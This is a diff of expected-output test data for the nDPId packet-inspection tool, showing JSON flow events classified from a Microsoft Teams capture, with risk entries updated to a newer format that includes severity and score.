+00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041693516,"flow_last_seen":1587041695435,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":207,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50018,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":31,"flow_first_seen":1587041693582,"flow_last_seen":1587041694243,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6838,"flow_avg_l4_payload_len":220,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.123","src_port":50021,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00613{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"ICMP","breed":"Acceptable","category":"Network"}}
-00743{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10":"TLS Certificate Mismatch","15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00656{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00712{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00639{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041697660,"flow_last_seen":1587041697673,"flow_idle_time":120000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":36,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"93.71.110.205","dst_ip":"192.168.1.6","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}}
+00930{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1587041693849,"flow_last_seen":1587041697765,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":7358,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.250.153","src_port":50036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1587041676435,"flow_last_seen":1587041676536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":12621,"flow_avg_l4_payload_len":315,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":1300,"flow_first_seen":1587041677243,"flow_last_seen":1587041697130,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":750126,"flow_avg_l4_payload_len":577,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60536,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041682144,"flow_last_seen":1587041685098,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9034,"flow_avg_l4_payload_len":244,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60542,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00819{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1587041685240,"flow_last_seen":1587041685471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":30424,"flow_avg_l4_payload_len":585,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685984,"flow_last_seen":1587041686156,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8124,"flow_avg_l4_payload_len":324,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50016,"dst_port":50005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
 00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1587041687745,"flow_last_seen":1587041687963,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9450,"flow_avg_l4_payload_len":325,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.169.186.119","src_port":60563,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
-00648{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00649{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
-00651{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681744,"flow_idle_time":180000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":214,"flow_avg_l4_payload_len":107,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":63106,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00811{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1587041695278,"flow_last_seen":1587041696498,"flow_idle_time":180000,"flow_min_l4_payload_len":112,"flow_max_l4_payload_len":112,"flow_tot_l4_payload_len":560,"flow_avg_l4_payload_len":112,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.0.4","src_port":50036,"dst_port":50020,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"STUN.Teams","breed":"Safe","category":"VoIP"}}
+00674{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685092,"flow_last_seen":1587041685105,"flow_idle_time":180000,"flow_min_l4_payload_len":61,"flow_max_l4_payload_len":119,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65230,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":180000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685090,"flow_last_seen":1587041685136,"flow_idle_time":180000,"flow_min_l4_payload_len":45,"flow_max_l4_payload_len":167,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":106,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":61245,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Teams","breed":"Safe","category":"Collaborative"}}
+00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041681714,"flow_last_seen":1587041681754,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1587041676362,"flow_last_seen":1587041677077,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":60045,"flow_avg_l4_payload_len":779,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60532,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":34,"flow_first_seen":1587041677042,"flow_last_seen":1587041677375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":20082,"flow_avg_l4_payload_len":590,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60535,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":26,"flow_first_seen":1587041678029,"flow_last_seen":1587041678303,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12049,"flow_avg_l4_payload_len":463,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60537,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681745,"flow_last_seen":1587041681895,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7654,"flow_avg_l4_payload_len":382,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60538,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":20,"flow_first_seen":1587041681755,"flow_last_seen":1587041681908,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7598,"flow_avg_l4_payload_len":379,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60539,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
